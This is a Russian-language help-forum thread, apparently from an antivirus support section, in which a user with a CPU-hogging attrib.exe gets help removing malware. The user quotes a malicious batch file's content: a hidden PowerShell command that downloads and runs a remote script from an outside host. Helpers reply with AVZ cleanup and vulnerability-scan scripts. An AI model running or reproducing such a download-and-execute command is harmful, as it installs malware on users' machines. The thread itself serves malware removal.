Перейти к содержанию
Правила раздела

attrib.exe , который грузит все шесть ядер до 90%

Евгений Овсянников

От Евгений Овсянников
в Помощь в удалении вирусов

 Share

Рекомендуемые сообщения

Евгений Овсянников Новичок

Евгений Овсянников

Опубликовано
Опубликовано

проблема та же. третьи сутки бьюсь с attrib.exe , который грузит все шесть ядер до 90%. Из диспетчера выловил, что создаются батники в win/temp
скрипт 8 от AVZ выполнил, архив на сайте загрузил (MD5 карантина: 570C9E77CC4490A57626F8A801CCC5C5)
результат проверки
что делать дальше?

 

Сообщение от модератора Mark D. Pearlstone
Перемещено из темы

 

лог хайджек
штатный NOD32, Kaspersky Virus Removal Tool 2015 и Dr.Web CureIt!. проблему не решили.
SpyHunter тоже не помогает.

AdwCleanerC00.txt

AdwCleanerS00.txt

AdwCleanerS01.txt

hijackthis.log

Ссылка на комментарий
Поделиться на другие сайты
regist Корифей

regist

Опубликовано
Опубликовано 

C:\Program Files\Common Files\restore_rev.bat

вам знаком?

 

"Пофиксите" в HijackThis:

 

O4 - HKCU\..\RunOnce: [Application Restart #3] = C:\Program Files (x86)\Google\Chrome\Application\chrome.exe --flag-switches-begin --flag-switches-end --restore-last-session -- http://ekaterinburg.hh.ru/vacancy/12482091?&utm_medium=email&utm_source=email&utm_campaign=vacancies_selected&utm_content=2015_01_15&loginkey=Fx3kW6m1kmDDGNw6wdeLzYg1n4CNGIiIgZZs9w75Miba7Bwwbg--
O4-32 - HKLM\..\Run: [AsioReg] = C:\Windows\system32\REGSVR32.exe /S CTASIO.DLL
O4-32 - HKLM\..\Run: [AsioThk32Reg] = C:\Windows\system32\REGSVR32.EXE /S CTASIO.DLL
O9 - Button: HKCU\..\{7558B7E5-7B26-4201-BEDB-00D5FF534523} - Mail.Ru Агент - (no file)
O9 - Tools menu item: HKCU\..\{7558B7E5-7B26-4201-BEDB-00D5FF534523} - Mail.Ru Агент - (no file)
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers:   MailRuCloudIconOverlay0 - {64A9418A-B6B1-4112-B75C-E61633C9A31F} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers:   MailRuCloudIconOverlay1 - {6A2E142B-EA63-433A-AC05-5223CBD26E65} - (no file)
O21-32 - HKLM\..\ShellIconOverlayIdentifiers:   MailRuCloudIconOverlay2 - {6AFCC535-2F12-4F50-9F0A-1CF856CFC95D} - (no file)

 

соберите свежие логи Автологером.

  • Согласен 1
Ссылка на комментарий
Поделиться на другие сайты
Евгений Овсянников Новичок

Евгений Овсянников

Опубликовано
  • Автор
Опубликовано (изменено)

вам знаком?

нет

внутри вот это

 

powershell -ExecutionPolicy ByPass -WindowStyle Hidden -Command "iex ((new-object net.webclient).DownloadString('http://77.super-me.online/files/restore_rev.ps1'))"

 

 

"Пофиксите" в HijackThis:

проблема осталась

CollectionLog-2018.07.15-16.34.zip

Изменено пользователем Евгений Овсянников
Ссылка на комментарий
Поделиться на другие сайты
regist Корифей

regist

Опубликовано
Опубликовано

Здравствуйте!

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):
 

begin
 ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
 ClearQuarantineEx(true);
 QuarantineFile('C:\Program Files\Common Files\restore_rev.bat', '');
 DeleteFile('C:\Program Files\Common Files\restore_rev.bat', '64');
 ExecuteFile('schtasks.exe', '/delete /TN "RestoreRevTask" /F', 0, 15000, true);
 CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
 ExecuteWizard('SCU', 2, 3, true);
RebootWindows(true);
end.

После выполнения скрипта компьютер перезагрузится.

 - Файл quarantine.zip из папки AVZ отправьте по адресу newvirus@kaspersky.com
Полученный ответ сообщите здесь (с указанием номера KLAN)
 
Повторите логи по правилам. Для повторной диагностики запустите снова Autologger.
  • Согласен 1
Ссылка на комментарий
Поделиться на другие сайты
Евгений Овсянников Новичок

Евгений Овсянников

Опубликовано
  • Автор
Опубликовано (изменено)

Полученный ответ сообщите здесь (с указанием номера KLAN)

KLAN-8402220766

 

Благодарим за обращение в Антивирусную Лабораторию

 
Присланные вами файлы были проверены в автоматическом режиме.
 
В антивирусных базах информация по присланным вами файлам отсутствует:
restore_rev.bat
 
Файлы переданы на исследование. Если результат исследования изменится, мы дополнительно сообщим вам по электронной почте.
        
Это сообщение сформировано автоматической системой обработки писем. Пожалуйста, не отвечайте на него.
 
Антивирусная Лаборатория, Kaspersky Lab HQ
 
"Ленинградское шоссе 39A/3, Москва, 125212, Russia
Телефон/Факс: + 7 (495) 797 8700 

проблема решена. 

в ДЗ процесса больше нет.

CollectionLog-2018.07.15-18.14.zip

Изменено пользователем Евгений Овсянников
Ссылка на комментарий
Поделиться на другие сайты
regist Корифей

regist

Опубликовано
Опубликовано 

AdwCleaner, версия 7.2.1 [20180714]-->"C:\Program Files (x86)\AdwCleaner\unins000.exe"

деинсталируйте, тем более вы скачали левый инсталятор в фейкового сайта.

 

Выполните скрипт в AVZ при наличии доступа в интернет:

 

 

var
LogPath : string;
ScriptPath : string;

begin
 LogPath := GetAVZDirectory + 'log\avz_log.txt';
 if FileExists(LogPath) Then DeleteFile(LogPath);
 ScriptPath := GetAVZDirectory +'ScanVuln.txt';

  if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 1) then ExecuteScript(ScriptPath) else begin
    if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 0) then ExecuteScript(ScriptPath) else begin
       ShowMessage('Невозможно загрузить скрипт AVZ для обнаружения наиболее часто используемых уязвимостей!');
       exit;
      end;
  end;
 if FileExists(LogPath) Then ExecuteFile('notepad.exe', LogPath, 1, 0, false)
end.

После его работы, если будут найдены уязвимости, в блокноте откроется файл avz_log.txt со ссылками на обновления системы и критичных к безопасности программ, которые нужно загрузить и установить. В первую очередь это относится к Java Runtime Environment, Adobe Reader и Adobe Flash Player, это программы, уязвимостями в которых наиболее часто пользуются для внедрения зловредов в систему.

 

Выполните рекомендации после лечения.

 

  • Согласен 2
Ссылка на комментарий
Поделиться на другие сайты
Евгений Овсянников Новичок

Евгений Овсянников

Опубликовано
  • Автор
Опубликовано

 

 


Выполните скрипт в AVZ при наличии доступа в интернет:

 

Поиск критических уязвимостей

Уязвимость в MSXML делает возможным удаленное выполнение кода
Запускайте обновление от имени Администратора
 
Обновление для системы безопасности Microsoft Office Word 2007
 
Обновление для системы безопасности Microsoft Office Word 2003 Compatibility Pack
 
Обнаружено уязвимостей: 3
 
Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
 Share
Перейти к списку тем

  • Похожий контент

    • MaximLem
      [РЕШЕНО] Вирусы, которые обнаружил Windows Defender
      От MaximLem
      Здравствуйте, хотел бы обратиться за помощью в связи с ситуацией с вирусами на компьютере. Честно говоря, не знаю точно после чего эти вирусы появились., находятся они в разделе "Разрешённые угрозы". Логи и скриншот прикрепил
    • seregalazerniy
      Выбивает пользователей, которые работают в 1С через RDP
      От seregalazerniy
      Есть ряд пользователей которые работают в 1С через RDP, на Win 10. Их периодически "выбивает" из сессии и происходит переподключение к серверу, бывает что на дню по 15 раз, а бывает и ни разу, в чем может быть причина?
      В логах пусто
      На данный момент порыскав по просторам интернета набрел на отключение в сервере автотюнинга
      netsh interface tcp set global autotuninglevel=disabled
      Не помогло
      Все компы подключены по локальной сети, и подключение происходит по ней. Впн не используем.
    • dext
      не могу удалить вирус который нашел майкрософт дефендерс
      От dext
      вчера было все нормально, но сегодня вечером заметил что с пк что-то не так и через доктор веб проверил, было 3 вируса log4j, ещё вирус с торрентом и там ещё один вирус, почистил всё, и потом приходит уведомления от майкрософта дефендерс, я пытался удалить но, я тупо не нашел эти файлы, или удалил их, но пишет все равно эту фигню, и пк все равно не очень работает хорошо, 16 гб оперативы у пк, и я ещё заметил только что, что Log4j не удалился, помогите
       



    • Northrei
      Майнер грузит ЦП uTorrentProPro.exe
      От Northrei
      Доброго времени суток! Помогите, пожалуйста 🙏
      Устанавливал несколько игр с торрента, после чего заметил сильную загрузку ЦП в обычных задачах. 
      Выявил, что грузит проц приложение uTorrent, хотя оно должно быть закрыто. Удалил его, оно автоматически при новом запуске устанавливается снова в тихом режиме (просто в недавно добавленных опять его вижу).
      Касперский Free нашёл 2 майнера, вырезал их, однако ситуация повторяется и дальше.

      avz_log.txt
    • Maksim28
      Вирус uTorrent.pro грузит процессор
      От Maksim28
      Здравствуйте, столкнулся с проблемой в виде майнера на своем компьютере. Скачивал игру с интернета, но видимо поймал вирус. В диспетчере задач процесс uTorrent.pro бывает грузит процессор на 100 процентов. Пробовал использовать антивирусы, но не помогает. После перезагрузки компьютера, он снова появляется.
      CollectionLog-2024.09.02-19.05.zip
×
×
  • Создать...